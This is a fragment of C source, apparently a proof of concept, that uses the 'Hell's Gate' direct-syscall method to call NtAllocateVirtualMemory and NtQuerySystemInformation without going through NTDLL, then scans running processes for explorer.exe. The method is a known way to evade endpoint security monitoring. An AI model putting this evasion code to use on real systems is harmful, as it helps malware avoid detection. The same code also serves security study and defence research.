index);\r\n\t\t\tif (ntAllocVMSyscallNumber) {\r\n\t\t\t\tntAllocVMSyscallNumber = ntAllocVMSyscallNumber + index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ntAllocVMSyscallNumber == 0) {\r\n\t\t\tprintf(\"[!] Could not resolve the syscall number for %s, giving up\\r\\n\", ntAllocVMStr);\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tprintf(\"[+] %x : Syscall number for NTDLL.%s\\r\\n\\r\\n\", ntAllocVMSyscallNumber, ntAllocVMStr);\r\n\r\n\t// Allocate the buffer for the process information returned from NtQuerySystemInformation\r\n\tULONG size = 1 << 18;\r\n\tPVOID base_addr = NULL;\r\n\tSIZE_T buffSize1 = (SIZE_T)size;\r\n\tULONG required = 0;\r\n\r\n\t// NtAllocateVirtualMemory\r\n\tHellsGate(ntAllocVMSyscallNumber);\r\n\tHellDescent((HANDLE)-1, &base_addr, 0, &buffSize1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\r\n\t// NtQuerySystemInformation\r\n\tHellsGate(ntQrySysInfoSyscallNumber);\r\n\r\n\tNTSTATUS status = HellDescent(SystemProcessInformation, base_addr, size, &required);\r\n\r\n\t// NtQuerySystemInformation reports an undersized buffer as STATUS_INFO_LENGTH_MISMATCH (0xC0000004); STATUS_BUFFER_TOO_SMALL is kept for the original check\r\n\tif (status == STATUS_BUFFER_TOO_SMALL || status == (NTSTATUS)0xC0000004L) {\r\n\t\tsize = required + (1 << 14);\r\n\t\tSIZE_T buffSize2 = size;\r\n\t\t// Let the kernel choose a fresh region: re-requesting the old base address with a larger size fails (the first block is leaked, acceptable for a PoC)\r\n\t\tbase_addr = NULL;\r\n\t\t// NtAllocateVirtualMemory\r\n\t\tHellsGate(ntAllocVMSyscallNumber);\r\n\t\tHellDescent((HANDLE)-1, &base_addr, 0, &buffSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\t\t// Re-select NtQuerySystemInformation before the retry; HellsGate() still points at the allocate syscall here\r\n\t\tHellsGate(ntQrySysInfoSyscallNumber);\r\n\t\tstatus = HellDescent(SystemProcessInformation, base_addr, size, &required);\r\n\t}\r\n\r\n\tif (status != 0 || base_addr == NULL) {\r\n\t\tprintf(\"[!] NtQuerySystemInformation failed: 0x%lx\\r\\n\", status);\r\n\t\treturn;\r\n\t}\r\n\r\n\tprocinfo = (SYSTEM_PROCESS_INFORMATION*)base_addr;\r\n\twhile (TRUE) {\r\n\t\tBOOL check = 
compExplorer(procinfo->ImageName.Buffer);\r\n\t\tif (check == 1) {\r\n\t\t\tprintf(\"%ws | PID: %6u | PPID: %6u\\n\",\r\n\t\t\t\tprocinfo->ImageName.Buffer,\r\n\t\t\t\tHandleToULong(procinfo->UniqueProcessId),\r\n\t\t\t\tHandleToULong(procinfo->InheritedFromUniqueProcessId)\r\n\t\t\t);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t// The last entry carries NextEntryOffset == 0; without this check the loop re-tests that entry forever when explorer.exe is absent\r\n\t\tif (procinfo->NextEntryOffset == 0) {\r\n\t\t\tprintf(\"[!] explorer.exe not found in the process list\\r\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tprocinfo = (SYSTEM_PROCESS_INFORMATION*)((BYTE*)procinfo + procinfo->NextEntryOffset);\r\n\t}\r\n\treturn;\r\n}"
  }
]